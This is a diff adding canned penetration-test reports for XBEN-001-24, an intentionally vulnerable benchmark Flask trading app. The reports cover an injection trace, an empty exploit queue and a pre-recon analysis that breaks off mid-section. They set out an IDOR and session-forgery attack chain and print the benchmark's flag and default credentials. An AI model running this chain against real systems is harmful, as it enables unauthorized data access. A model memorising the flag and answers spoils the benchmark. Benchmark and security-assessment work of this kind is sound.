+## 1. Executive Summary
+
+- **Analysis Status:** Complete
+- **Key Outcome:** No SQL injection, command injection, path traversal, LFI/RFI, SSTI, or deserialization vulnerabilities were identified in this application. All user-supplied input vectors reach database sinks exclusively through SQLAlchemy ORM parameterized queries, and all template rendering uses fixed template files with Jinja2 auto-escaping. The exploitation queue is empty for injection-class vulnerabilities.
+- **Purpose of this Document:** This report provides the complete source-to-sink trace for every externally reachable input vector in XBEN-001-24, confirming the absence of exploitable injection paths. The primary security weakness in this application is an IDOR (Insecure Direct Object Reference) authorization flaw, which is an authorization-class vulnerability outside the injection scope but noted here for completeness.
+
+---
+
+## 2. Dominant Vulnerability Patterns
+
+- **Description:** All database interactions use SQLAlchemy ORM methods (`filter_by()`, `query.get()`, relationship accessors) which generate parameterized SQL queries. No raw SQL string construction involving user input was observed anywhere in the application.
+- **Implication:** SQL injection is structurally prevented across all data access paths by the consistent use of the ORM layer. There are no identifier slots, ORDER BY clauses, or LIKE patterns that would require whitelist enforcement — all user input exclusively reaches SQL-val slots via bound parameters.
+- **Representative:** N/A — no vulnerable findings. All paths confirmed safe.
+
+---
+
+## 3. Strategic Intelligence for Exploitation
+
+- **Defensive Evasion (WAF Analysis):**
+  - No WAF behavior was observed during static analysis. The nginx ingress handles TLS termination only; there is no application-layer WAF identified in the stack.
+  - Moot for injection: the absence of injection vulnerabilities makes WAF bypass analysis irrelevant for this phase.
+
+- **Error-Based Injection Potential:**
+  - No error-based injection vector identified. Flask/SQLAlchemy errors are not returned verbosely to the client in observable ways that would indicate SQL structure influence.
+
+- **Confirmed Database Technology:**
+  - Database is **MySQL 8.0**, confirmed via `__init__.py` (PyMySQL connector, `mysql+pymysql://` URI).
+  - Relevant for future reference: MySQL-specific payloads would be appropriate if an injection surface is discovered.
+
+- **Notable Non-Injection Findings (out of scope but flagged):**
+  - **IDOR** at `GET /order/<int:order_id>/receipt` — any authenticated user can retrieve any order by integer ID. No ownership check exists. This is the primary vulnerability for the exploitation phase (authorization, not injection).
+  - **Session Forgery** — hardcoded `SECRET_KEY = 'your_secret_key'` (`__init__.py:13`) allows crafting valid Flask session cookies with arbitrary `user_id` values. This compounds the IDOR.
+  - **DOM-Based XSS** — `orders.html:109` uses jQuery `.html(data)` to inject the raw AJAX response from `/order/<id>/receipt` directly into the DOM without sanitization. This is a client-side sink.
+
+---
+
+## 4. Vectors Analyzed and Confirmed Secure
+
+These input vectors were traced end-to-end and confirmed to have robust, context-appropriate defenses. They are **low-priority** for further injection testing.
+
+| **Source (Parameter/Key)** | **Endpoint / File Location** | **Defense Mechanism Implemented** | **Verdict** |
+|---|---|---|---|
+| `username` (POST form field) | `POST /xben-001-24/` → `routes.py:23` | SQLAlchemy ORM `filter_by(username=username)` — parameterized SQL-val binding | SAFE |
+| `password` (POST form field) | `POST /xben-001-24/` → `routes.py:24` | SQLAlchemy ORM `filter_by(password=password)` — parameterized SQL-val binding | SAFE |
+| `?error=` (URL query param) | `GET /xben-001-24/` → `routes.py:21` | Passed as Jinja2 context variable to `render_template()`; Jinja2 HTML auto-escaping active for `.html` files | SAFE |
+| `session['user_id']` (session cookie) | `GET /xben-001-24/dashboard` → `routes.py:46` | SQLAlchemy `User.query.get(user_id)` — primary key lookup, parameterized | SAFE |
+| `session['user_id']` (session cookie) | `GET /xben-001-24/orders` → `routes.py:59` | SQLAlchemy `User.query.get(user_id)` + relationship accessor `user.orders` — both parameterized | SAFE |
+| `order_id` (URL path param) | `GET /xben-001-24/order/<int:order_id>/receipt` → `routes.py:69` | Flask `<int:order_id>` converter enforces integer type; `Order.query.get(order_id)` — parameterized primary key lookup | SAFE |
+| DB-sourced fields in templates | All authenticated templates | Jinja2 `{{ var }}` expressions with auto-escaping; `render_template()` used (not `render_template_string()`); user data never embedded in the template string itself | SAFE |
+
+---
+
+### Detailed Trace Records
+
+#### Trace 1: `username` / `password` → Login Query
+
+- **Source:** `request.form['username']` (routes.py:23), `request.form['password']` (routes.py:24)
+- **Combined Sources:** Both form fields merged at routes.py:25 into a single ORM call
+- **Path:** `login()` (routes.py:20) → `User.query.filter_by(username=..., password=...)` (routes.py:25)
+- **Sink Call:** `routes.py:25` — `User.query.filter_by(username=username, password=password).first()`
+- **Slot Type:** SQL-val (both username and password are value comparisons)
+- **Sanitization Observed:** SQLAlchemy ORM parameter binding (implicit, generated by SQLAlchemy at query construction time)
+- **Concat Occurrences:** None. No string concatenation involving user input before or after the ORM call.
+- **Verdict:** SAFE
+- **Reason:** SQLAlchemy `filter_by()` with keyword arguments generates parameterized SQL (`WHERE username = %s AND password = %s`) with values bound separately. No string interpolation occurs.
+- **Confidence:** High
+
+---
+
+#### Trace 2: `?error=` URL Parameter → Template Rendering
+
+- **Source:** `request.args.get('error')` (routes.py:21)
+- **Path:** `login()` (routes.py:20) → `render_template('login.html', error=error)` (routes.py:31) → Jinja2 `{{ error }}` (login.html:26)
+- **Sink Call:** `login.html:26` — `{{ error }}` within `render_template()` context
+- **Slot Type:** TEMPLATE-expression (rendered as HTML output variable)
+- **Sanitization Observed:** Jinja2 auto-escaping (Flask default for `.html` templates); `render_template()` (not `render_template_string()`) — template is fixed, user value is only a context variable
+- **Concat Occurrences:** None. The error string is never concatenated into a template string.
+- **Verdict:** SAFE
+- **Reason:** The user-supplied `error` value is passed as a bound Jinja2 context variable, not embedded in the template source. Jinja2 HTML auto-escaping converts `<`, `>`, `"`, `'`, and `&` to HTML entities before output. No SSTI possible because the template file itself is static and not user-controlled.
+- **Confidence:** High
+
+---
+
+#### Trace 3: `session['user_id']` → Dashboard User Lookup
+
+- **Source:** `session.get('user_id')` (routes.py:46) — value originates from HMAC-signed Flask session cookie
+- **Path:** `dashboard()` (routes.py:43) → `User.query.get(user_id)` (routes.py:48) → `render_template('dashboard.html', user=user)` (routes.py:49)
+- **Sink Call:** `routes.py:48` — `User.query.get(user_id)`
+- **Slot Type:** SQL-num (primary key integer lookup)
+- **Sanitization Observed:** SQLAlchemy ORM `query.get()` — primary key lookup using parameterized binding
+- **Concat Occurrences:** None
+- **Verdict:** SAFE
+- **Reason:** `User.query.get()` is a primary key fetch that generates `SELECT ... WHERE id = %s` with bound parameter. Even with a forged session (possible due to known `SECRET_KEY`), the value is only used as a bound parameter and cannot alter query structure.
+- **Notes:** Session forgery is feasible (`SECRET_KEY = 'your_secret_key'`), enabling privilege escalation to user_id=10001 (admin), but this is an authorization/IDOR issue, not SQLi.
+- **Confidence:** High
+
+---
+
+#### Trace 4: `session['user_id']` → Orders Listing
+
+- **Source:** `session.get('user_id')` (routes.py:59)
+- **Path:** `orders()` (routes.py:56) → `User.query.get(user_id)` (routes.py:61) → `user.orders` relationship accessor → `render_template('orders.html', orders=user.orders)` (routes.py:62)
+- **Sink Call:** `routes.py:61` — `User.query.get(user_id)`; implicit relationship query for `user.orders`
+- **Slot Type:** SQL-num (primary key lookup) + SQL-val (FK relationship join)
+- **Sanitization Observed:** SQLAlchemy ORM parameterized queries for both the user lookup and the relationship accessor
+- **Concat Occurrences:** None
+- **Verdict:** SAFE
+- **Confidence:** High
+
+---
+
+#### Trace 5: `order_id` Path Parameter → Receipt Lookup
+
+- **Source:** Flask route `<int:order_id>` (routes.py:69) — `order_id` is type-enforced as integer by Flask URL converter
+- **Path:** `order_receipt(order_id)` (routes.py:70) → `Order.query.get(order_id)` (routes.py:79) → `render_template('receipt.html', order=order)` (routes.py:81)
+- **Sink Call:** `routes.py:79` — `Order.query.get(order_id)`
+- **Slot Type:** SQL-num (primary key integer lookup)
+- **Sanitization Observed:** (1) Flask `<int:...>` URL converter at route binding — non-integers receive HTTP 404; (2) SQLAlchemy ORM `query.get()` parameterized binding
+- **Concat Occurrences:** None
+- **Verdict:** SAFE (from injection perspective)
+- **Notes:** This endpoint has a severe **IDOR** authorization flaw — no ownership check verifies that the requesting user owns `order_id`. Any authenticated user can retrieve any order. This is the primary exploitation target for the authorization specialist, not the injection specialist.
+- **Confidence:** High
+
+---
+
+#### Trace 6: `__init__.py` f-string SQL Construction
+
+- **Source:** `os.environ.get('DB_SCHEMA', 'database')` (`__init__.py:19`)
+- **Path:** `_db_schema` → `f'CREATE DATABASE IF NOT EXISTS \`{_db_schema}\`'` (`__init__.py:23`)
+- **Sink Call:** `__init__.py:23` — `_conn.cursor().execute(f'CREATE DATABASE IF NOT EXISTS \`{_db_schema}\`')`
+- **Slot Type:** SQL-ident (database name identifier)
+- **Sanitization Observed:** None
+- **Verdict:** SAFE (not externally exploitable)
+- **Reason:** The `DB_SCHEMA` value comes from a server-side environment variable set at container deploy time, not from any user-supplied HTTP input. No external attacker can influence this value.
+- **Confidence:** High
+
+---
+
+#### Trace 7: Jinja2 Templates — All DB-Sourced Fields
+
+- **Sources:** `user.first_name`, `user.last_name` (dashboard.html:46); `order.date`, `order.ticker`, `order.operation_type`, `order.quantity`, `order.price`, `order.id`, `order.receipt` (orders.html, receipt.html)
+- **Path:** DB fields → ORM model objects → `render_template()` context → Jinja2 `{{ }}` expressions
+- **Sink Type:** HTML output (not SQL/command)
+- **Sanitization Observed:** Jinja2 HTML auto-escaping for all `{{ }}` expressions in `.html` template files
+- **Verdict:** SAFE (from injection perspective)
+- **Notes:** `render_template_string` is imported in routes.py:1 but never called. No user-provided strings are ever passed as template source code.
+- **Confidence:** High
+
+---
+
+## 5. Analysis Constraints and Blind Spots
+
+- **`password.html` Template — No Associated Route:** The template at `templates/password.html` (which renders `{{ first_name }}`, `{{ username }}`, `{{ user_id }}` including a hidden `user_id` field) has no corresponding route in routes.py. This is dead code or a removed feature. No injection surface exists from it.
+
+- **MySQL Stored Procedures:** No stored procedure calls were identified in the application code. All DB interactions go through SQLAlchemy ORM model methods.
+
+- **Asynchronous/Background Jobs:** No Celery, RabbitMQ, or background task infrastructure is present. All processing is synchronous within Flask request handlers.
+
+- **File Upload Functionality:** No file upload endpoints exist. No `multipart/form-data` handling with filenames reaching file system operations.
+
+- **No Admin-Only Routes:** Despite an `admin` user (user_id 10001) existing, there are no admin-specific routes or privileged endpoints in the application beyond the standard 6 endpoints.

--- a/charts/ssd/config/toolchain/shannon-stub-deliverables/injection_exploitation_queue.json
+++ b/charts/ssd/config/toolchain/shannon-stub-deliverables/injection_exploitation_queue.json
@@ -1,0 +1,3 @@
+{
+  "vulnerabilities": []
+}

--- a/charts/ssd/config/toolchain/shannon-stub-deliverables/pre_recon_deliverable.md
+++ b/charts/ssd/config/toolchain/shannon-stub-deliverables/pre_recon_deliverable.md
@@ -1,0 +1,409 @@
+# Pre-Recon Code Analysis — XBEN-001-24 Trading Platform
+
+**Target:** XBEN-001-24 — "IDOR Broken Authorization: Trading Platform"
+**Assessment Date:** 2026-05-20
+**Analyst Role:** Principal Engineer / Code Intelligence Gatherer
+**Engagement Phase:** PRE-RECON (Entry Point of Workflow)
+
+---
+
+# Penetration Test Scope & Boundaries
+
+## In-Scope: Network-Reachable Components
+
+All HTTP routes served by the Flask application container at port 80 are in scope. This includes:
+
+- Publicly exposed web pages (`/`, login/logout flows)
+- Authenticated endpoints accessible via the application's standard session-based login mechanism (`/dashboard`, `/orders`, `/order/<id>/receipt`)
+- Any utility or debug endpoint served by the running application process
+
+The application is containerized via Docker and deployed either locally (docker-compose) or via Kubernetes with an nginx-ingress. The **WSGI application exposed on port 80** is the network-accessible attack surface.
+
+## Out-of-Scope: Locally Executable Only
+
+The following components are excluded because they cannot be invoked through the running application's network interface:
+
+- **MySQL initialization scripts** (`/repos/validation-benchmarks/benchmarks/XBEN-001-24/mysql/`) — executed only during container build/start, not network-reachable
+- **Docker/Helm build scripts** (`Makefile`, `common.mk`, `benchmark.yaml`) — CI/CD tooling, not part of the application runtime
+- **`docker-entrypoint.sh`** — runs at container startup to write the flag to disk; not a network endpoint
+- **GitHub Actions workflows** — pipeline automation; not application endpoints
+
+---
+
+## 1. Executive Summary
+
+The target application, XBEN-001-24, is a Flask-based stock trading order management platform that contains a **critical Insecure Direct Object Reference (IDOR) vulnerability** as its primary known attack surface. The application implements session-based authentication but completely fails to enforce authorization at the object level: any authenticated user can retrieve the receipt of any order by directly manipulating the integer `order_id` in the URL `/order/<int:order_id>/receipt`. The flag (the most sensitive asset) is stored as the `receipt` field of Order ID `300401` — an order with no user association — making it trivially accessible to any logged-in attacker.
+
+Beyond the primary IDOR, the application exhibits a cluster of compounding security weaknesses that cascade into a deeply insecure posture. The Flask `SECRET_KEY` is the placeholder literal `'your_secret_key'`, rendering all session cookies forgeable. User passwords are stored and compared in plaintext with no hashing. The database runs as MySQL root with a hardcoded default password. The `.env` file containing the flag literal is committed to the repository and tracked by git. The Apache `httpd` configuration sets `Access-Control-Allow-Origin: *`, and the application sets contradictory `Cache-Control` headers that may leak sensitive data through caching. None of these weaknesses require exploitation beyond authenticated access, since the IDOR is the primary vector.
+
+From an external attacker's perspective, the attack chain is straightforward: register or use pre-seeded credentials (`test:test`), authenticate to obtain a session cookie, then issue `GET /order/300401/receipt` to retrieve the flag. The application provides no rate limiting, no CSRF tokens, no brute-force protection, and no mechanism to detect or block enumeration. The DOM-level jQuery `.html()` sink in `orders.html` also introduces a stored XSS vector if attacker-controlled content is ever written to the `receipt` field, though in the current seeded data the flag is the only non-user-writable content.
+
+---
+
+## 2. Architecture & Technology Stack
+
+- **Framework & Language:** Python 3 / Flask 3.0.3. The application is a server-side rendered monolith using Flask's built-in routing, Jinja2 templating, and Flask-SQLAlchemy 3.1.1 as the ORM. PyMySQL 1.1.0 is used as the MySQL connector. No asynchronous framework (asyncio, FastAPI) is present — all request handling is synchronous.
+  - **Security Implication:** Flask 3.x enables Jinja2 auto-escaping by default for `.html` templates, which limits reflected XSS from server-rendered variables. However, auto-escaping does not prevent the DOM-based XSS sink via jQuery's `.html()` method, which ingests the full server response into the DOM without additional sanitization.
+  - **Dependency Manifest:** `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/requirements.txt` (Flask==3.0.3, flask-sqlalchemy==3.1.1, pymysql==1.1.0)
+
+- **Architectural Pattern:** Single-tier monolith. The Flask application directly reads from and writes to a MySQL 8.0 database. There are no internal microservices, message queues, or background workers. The application server (Apache 2.4 with `mod_wsgi`) and the database (MySQL) run in separate Docker containers orchestrated by `docker-compose.yml`, but both are co-located within the same Docker network (`idor_broken_authz_trading_platform_default`). Trust boundary: only the Flask container needs database access, but MySQL is exposed to the internal Docker network (port 3306).
+  - **Security Implication:** Because all business logic lives in a single process with direct DB access, a successful authorization bypass (IDOR) immediately exposes database rows without any intermediate service boundary to traverse.
+
+- **Critical Security Components:**
+  - **Authentication:** Session-based (`flask.session`). Session cookie signed with `SECRET_KEY = 'your_secret_key'` — trivially forgeable.
+  - **Authorization:** None at the object level. The IDOR endpoint (`/order/<int:order_id>/receipt`) verifies only that `session['user_id']` is set, not that the order belongs to the requesting user.
+  - **Data Protection:** Plaintext passwords. No TLS between app and DB containers. No field-level encryption. The flag is written to the `receipt` column of a database row readable by any authenticated user.
+  - **Web Server Config:** Apache with `Access-Control-Allow-Origin: *` — permits cross-origin reads of all authenticated responses.
+  - **File:** `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/__init__.py`
+  - **File:** `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/idor_broken_authz_trading_platform-httpd.conf`
+  - **File:** `/repos/validation-benchmarks/benchmarks/XBEN-001-24/docker-compose.yml`
+
+---
+
+## 3. Authentication & Authorization Deep Dive
+
+### Authentication Mechanisms
+
+The application uses **Flask session-based authentication**. Upon successful login, `session['user_id']` is set to the authenticated user's database primary key (an integer). All protected routes check for the presence of this session key and redirect to login if absent. There is no token-based auth, no OAuth, no MFA, and no account lockout.
+
+**Authentication Endpoints:**
+
+| Method | URL | File | Line(s) | Notes |
+|--------|-----|------|---------|-------|
+| `GET` | `/` | `routes.py` | 17 | Renders login form |
+| `POST` | `/` | `routes.py` | 17–31 | Login: reads `username`+`password` from form, plaintext comparison |
+| `POST` | `/logout` | `routes.py` | 35–39 | Clears session |
+
+There is **no registration endpoint** and no password reset endpoint. There is no token refresh or logout-all-sessions mechanism. Hard-coded test users are seeded in `__init__.py`:
+- **test / test** (user_id: 10032)
+- **admin / admin** (user_id: 10001)
+
+Login implementation (`routes.py` lines 22–27):
+```python
+username = request.form['username']
+password = request.form['password']
+user = User.query.filter_by(username=username, password=password).first()
+if user:
+    session['user_id'] = user.id
+```
+Passwords are compared in plaintext — there is no `bcrypt.check_password_hash()` or equivalent. Username enumeration is possible because the application responds differently to valid vs. invalid usernames (timing side-channel via DB query).
+
+### Session Cookie Security
+
+The Flask `SECRET_KEY` is set to the placeholder string `'your_secret_key'` (file: `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/__init__.py`, **line 13**). An attacker who knows this secret can forge arbitrary session cookies, elevating to any `user_id` including the admin (user_id: 10001) without credentials.
+
+**Session cookie flag configuration:** No explicit `SESSION_COOKIE_HTTPONLY`, `SESSION_COOKIE_SECURE`, or `SESSION_COOKIE_SAMESITE` directives are set anywhere in the codebase. Flask 3.x defaults: `HttpOnly=True` (default), `Secure=False` (default), `SameSite=Lax` (default). Because the application runs over HTTP (not HTTPS) in the default Docker deployment, the `Secure` flag is not relevant, but the absence of `SameSite=Strict` makes CSRF theoretically possible despite the `Lax` default.
+
+**Relevant files:**
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/__init__.py` (line 13 — SECRET_KEY)
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/routes.py` (lines 17–39 — auth logic)
+
+### Authorization Model & IDOR
+
+The authorization model is **completely absent at the resource level**. The application implements authentication-gate checks (is the user logged in?) but performs **zero ownership verification** when retrieving database objects. The canonical IDOR vulnerability is in the order receipt endpoint:
+
+**File:** `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/routes.py`, **lines 69–84**
+
+```python
+@app.route('/order/<int:order_id>/receipt')
+def order_receipt(order_id):
+    user_id = session.get('user_id')
+    if user_id:
+        # No authorization check — any authenticated user can access any order
+        order = Order.query.get(order_id)
+        return render_template('receipt.html', order=order)
+    else:
+        return redirect(url_for('login'))
+```
+
+The fix would be `Order.query.filter_by(id=order_id, user_id=user_id).first_or_404()`, but this check is intentionally absent. Order IDs are integer sequences exposed in the HTML (e.g., data attribute `data-order-id` in `orders.html` line 78), making enumeration trivial. The flag is stored in Order ID **300401** (no user_id FK), and all seeded user orders have IDs in the 300100–300500 range, narrowing the brute-force window dramatically.
+
+**CSRF Protection:** `app.config['WTF_CSRF_ENABLED']` is not set, but Flask-WTF is not listed as a dependency — there is **no CSRF protection** on any POST endpoint. All state-changing operations (login, logout) are vulnerable to CSRF.
+
+### Multi-Tenancy Security
+
+This application has a single-tenant data model (one database schema, one user table) but all users share the same `orders` table. The intended isolation is purely application-layer: the `/orders` route correctly filters `user.orders` via the SQLAlchemy relationship. However, the `/order/<id>/receipt` route breaks this isolation and allows cross-user data access. There is no database-level row security (MySQL RLS), no schema separation, and no tenant token in queries.
+
+---
+
+## 4. Data Security & Storage
+
+### Database Security
+
+The backend is **MySQL 8.0**, running in a dedicated Docker container. The application connects as the **MySQL root user** with the default password `idor_broken_authz_trading_platform` (hardcoded fallback in `__init__.py` lines 16–20). This means a successful SQL injection (not present in this app due to ORM usage) or a direct DB connection would yield full administrative access to the entire MySQL instance.
+
+The SQLAlchemy ORM uses parameterized queries throughout, preventing SQL injection. However, the ORM provides no row-level security — authorization must be enforced at the application layer, which it is not on the receipt endpoint. The database schema has two tables: `user` (id, username, password, first_name, last_name, email) and `order` (id, date, ticker, operation_type, quantity, price, receipt, user_id FK). The `password` column stores plaintext strings; no hashing column or salt column exists.
+
+**File:** `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/models.py`
+**File:** `/repos/validation-benchmarks/benchmarks/XBEN-001-24/mysql/Dockerfile` (ENV MYSQL_ROOT_PASSWORD)
+
+### Sensitive Data Flows — Flag Exfiltration Path
+
+The flag travels through the following chain:
+
+1. **`.env` file** (tracked in git): `FLAG="flag{85c0d827-5e28-4577-be2b-319bdcbf872d}"` — exposed to anyone with repository access.
+2. **Container entrypoint** (`docker-entrypoint.sh` line 3): `echo -n "${FLAG}" > /flag` — written to container filesystem at `/flag`.
+3. **App initialization** (`__init__.py` lines 98–110): `open('/flag')` is read at startup and stored as the `receipt` column of Order ID 300401 in MySQL.
+4. **IDOR endpoint** (`routes.py` lines 69–84): `Order.query.get(300401)` retrieves the flag row with no ownership check.
+5. **Template rendering** (`receipt.html` line 14): `{{ order.receipt }}` outputs the flag into the HTML response body.
+
+This means a successful IDOR exploitation at step 4 directly yields the flag.
+
+### Password Storage & PII
+
+All user passwords are stored as plaintext strings in the `password` column of the `user` table (`models.py` lines 5–13). No hashing, salting, or key stretching is applied. The login query `User.query.filter_by(username=username, password=password)` compares plaintext directly. The `user` table also stores `first_name`, `last_name`, and `email` — all PII — with no field-level encryption.
+
+**File:** `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/models.py`
+
+### Cache-Control & HTTP Headers
+
+The `add_header()` after-request hook (`routes.py` lines 8–14) sets `Cache-Control` **twice**, with the second value (`public, max-age=0`) overwriting the first (`no-cache, no-store, must-revalidate`). The effective header sent to clients is `Cache-Control: public, max-age=0`, which permits public caching of responses — including authenticated receipt pages containing the flag. Proxies and CDNs respecting `public` may cache sensitive responses.
+
+```python
+@app.after_request
+def add_header(request):
+    request.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'  # Set #1
+    request.headers['Pragma'] = 'no-cache'
+    request.headers['Expires'] = '0'
+    request.headers['Cache-Control'] = 'public, max-age=0'  # Set #2 — OVERWRITES #1
+    return request
+```
+
+**File:** `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/routes.py` (lines 8–14)
+
+---
+
+## 5. Attack Surface Analysis
+
+### External Entry Points (In-Scope, Network-Reachable)
+
+All endpoints below are served by the Flask/WSGI application over HTTP on port 80. They are reachable from the external network via the Docker-exposed port or Kubernetes nginx-ingress.
+
+| Method | URL Pattern | Auth Required | Parameters | Security Risk |
+|--------|-------------|--------------|-----------|--------------|
+| `GET` | `/` | No | — | Public login form |
+| `POST` | `/` | No | `username` (form), `password` (form) | Plaintext credential comparison; no rate limiting; no CSRF token |
+| `POST` | `/logout` | Yes (session) | — | No CSRF token; CSRF logout possible |
+| `GET` | `/dashboard` | Yes | — | Returns authenticated user data |
+| `GET` | `/orders` | Yes | — | Returns list of user's orders; exposes order IDs via `data-order-id` attributes |
+| `GET` | `/order/<int:order_id>/receipt` | Yes | `order_id` (URL path — **integer**) | **CRITICAL IDOR**: No ownership check; any integer accepted; Order 300401 contains FLAG |
+
+**Primary IDOR Attack Surface:**
+
+The `/order/<int:order_id>/receipt` endpoint is the highest-risk surface. An attacker who is authenticated (using any valid credentials or a forged session cookie) can:
+1. Supply any integer as `order_id`
+2. Retrieve the `receipt` contents of any order in the database regardless of ownership
+3. Access Order ID 300401 specifically to retrieve the flag
+
+The integer order IDs are exposed in the orders page HTML (`orders.html` line 78: `data-order-id="{{ order.id }}"`), and the seeded data uses IDs in the 300001–300999 range, making brute-force enumeration practical within seconds. The endpoint returns a full rendered HTML page (`receipt.html`) with the `order.receipt` contents.
+
+**Session Forgery Attack Surface:**
+
+Because `app.secret_key = 'your_secret_key'` is publicly known from the source code, an attacker can forge Flask session cookies offline using tools like `flask-unsign`. A forged session with `user_id=10001` (admin) grants full authenticated access without needing credentials.
+
+**CORS Misconfiguration:**
+
+The Apache configuration (`idor_broken_authz_trading_platform-httpd.conf` line 11) sets `Header set Access-Control-Allow-Origin "*"`. Combined with the session-based auth, this means a malicious third-party website can make credentialed cross-origin requests to the application and read responses — enabling CSRF-augmented data exfiltration if a victim is authenticated.
+
+### Input Validation Patterns
+
+The application performs **minimal input validation**:
+- Login: `request.form['username']` and `request.form['password']` — no length limits, no character filtering. The SQLAlchemy ORM protects against SQL injection.
+- Receipt: `order_id` is Flask's `<int:>` converter, which enforces integer type but performs no range or ownership checks.
+- No request body size limits are configured at the application layer.
+- No WAF or rate-limiting middleware is present.
+
+### Background Processing
+
+There is **no background job processing** (no Celery, RQ, APScheduler, or async tasks) in this application. All processing is synchronous within the request-response cycle. The only out-of-band operation is the `docker-entrypoint.sh` startup script that writes the flag to disk — this is out of scope as it is not triggered by network requests.
+
+### Out-of-Scope Components (Noted for Completeness)
+
+| Component | Location | Reason for Exclusion |
+|-----------|----------|---------------------|
+| MySQL container | `docker-compose.yml` service `db` | Not exposed to external network; requires DB client, not HTTP |
+| `docker-entrypoint.sh` | `app/docker-entrypoint.sh` | Container startup script; not reachable via HTTP |
+| MySQL init SQL | `mysql/` directory | DB initialization scripts; executed by Docker, not by app requests |
+| Helm/K8s templates | `helm/xben-001-24/` | Deployment tooling; not application endpoints |
+
+---
+
+## 6. Infrastructure & Operational Security
+
+### Secrets Management
+
+Secrets are managed inconsistently across deployment modes:
+
+- **Development/Docker-compose:** The `FLAG` environment variable is sourced from `/repos/validation-benchmarks/benchmarks/XBEN-001-24/.env`, which is a **git-tracked file** containing the plaintext flag value `flag{85c0d827-5e28-4577-be2b-319bdcbf872d}`. This is a critical information disclosure — any party with repository read access has the flag. The `.gitignore` does not exclude `.env` files in the benchmarks directory.
+- **Kubernetes/Helm:** Secrets are stored in Kubernetes Secret objects (`helm/xben-001-24/templates/db-secret.yaml`), sourced from `values.yaml` and passed as `secretKeyRef` in the deployment manifest. This is a more appropriate pattern, but Helm `values.yaml` files may contain defaults.
+- **Application-level fallback:** `__init__.py` lines 16–20 hardcode default credentials as fallback values in `os.environ.get()` calls. If environment variables are not set, the application uses `'idor_broken_authz_trading_platform'` as the DB password and `'your_secret_key'` as the Flask secret — meaning a misconfigured deployment runs with known-bad credentials.
+
+**File:** `/repos/validation-benchmarks/benchmarks/XBEN-001-24/.env` (git-tracked, plaintext flag)
+**File:** `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/website/app/__init__.py` (lines 13–20)
+**File:** `/repos/validation-benchmarks/helm/xben-001-24/templates/db-secret.yaml`
+
+### Configuration Security & Security Headers
+
+The Apache virtual host configuration (`idor_broken_authz_trading_platform-httpd.conf`) and the application itself do **not configure** the following security headers:
+- `Strict-Transport-Security` (HSTS) — absent; application runs over HTTP
+- `Content-Security-Policy` — absent; no XSS protection policy
+- `X-Frame-Options` — absent; clickjacking possible
+- `X-Content-Type-Options` — absent
+- `Referrer-Policy` — absent
+
+The only headers set are the contradictory `Cache-Control` pair and `Pragma: no-cache`. The Kubernetes nginx-ingress (`helm/xben-001-24/templates/ingress.yaml`) configures TLS via Let's Encrypt (`letsencrypt-prod`) for production deployments, but no security headers are added at the ingress layer.
+
+**File:** `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/idor_broken_authz_trading_platform-httpd.conf`
+**File:** `/repos/validation-benchmarks/helm/xben-001-24/templates/ingress.yaml`
+
+### External Dependencies
+
+The application has a minimal dependency footprint: Flask 3.0.3, Flask-SQLAlchemy 3.1.1, PyMySQL 1.1.0. No CVE-known-vulnerable versions are used. The jQuery 3.5.1 library referenced in frontend templates has known prototype pollution issues but no critical RCE CVEs at this version. No third-party external services (external APIs, CDNs, payment gateways) are called by the application.
+
+### Monitoring & Logging
+
+There is **no application-level logging or monitoring** configured. Flask's default development logger may emit request logs to stdout/Docker logs, but there are no structured security event logs (failed login attempts, IDOR access patterns, anomalous enumeration). An attacker can enumerate all order IDs without generating any alertable signal.
+
+---
+
+## 7. Overall Codebase Indexing
+
+The repository at `/repos/validation-benchmarks/` is a security benchmark collection containing **104 independent CTF-style challenge applications** (XBEN-001-24 through XBEN-104-24), each designed to demonstrate a specific vulnerability class for automated security testing and penetration testing training. The benchmark relevant to this engagement is **XBEN-001-24**, which resides entirely within `/repos/validation-benchmarks/benchmarks/XBEN-001-24/`. Each benchmark follows a consistent structure: an `app/` directory containing the application source (in this case, a Python/Flask app under `app/website/`), a `mysql/` directory with Docker-based DB initialization scripts, a `docker-compose.yml` for local orchestration, a `.env` file with the flag and credentials, and `benchmark.json`/`benchmark.yaml` metadata files.
+
+The XBEN-001-24 Flask application is organized as a standard Flask package: `app/website/app/__init__.py` is the application factory that configures the database connection, initializes SQLAlchemy models, and seeds test data (including the flag); `app/website/app/routes.py` contains all HTTP route handlers; `app/website/app/models.py` defines the SQLAlchemy ORM models (`User`, `Order`); and `app/website/app/templates/` holds all Jinja2 HTML templates. The application is served by Apache 2.4 with `mod_wsgi`, configured via `app/idor_broken_authz_trading_platform-httpd.conf`. A Kubernetes Helm chart at `/repos/validation-benchmarks/helm/xben-001-24/` provides production deployment manifests including TLS-terminated ingress.
+
+The codebase structure makes security-relevant components highly discoverable: all routing is in a single `routes.py` file, the data model is in a single `models.py`, and the application initialization (including secret configuration and data seeding) is entirely in `__init__.py`. There are no indirect/dynamic route registrations, no plugin systems, and no code generation. The intentionally vulnerable code path (missing authorization check) is even documented in a comment within `routes.py` (lines 73–78), making it immediately apparent on code review.
+
+---
+
+## 8. Critical File Paths
+
+### Configuration
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/docker-compose.yml`
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/.env` *(git-tracked; contains plaintext FLAG)*
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/app/idor_broken_authz_trading_platform-httpd.conf` *(Apache vhost config; CORS: \*)*
+- `/repos/validation-benchmarks/benchmarks/XBEN-001-24/benchmark.json`
+- `/repos/validation-benchmarks/helm/xben-001-24/values.yaml`
+- `/repos/validation-benchmarks/helm/xben-001-24/templates/ingress.yaml`
+- `/repos/validation-benchmarks/helm/xben-001-24/templates/db-secret.yaml`
+
+### Authentication & Authorization
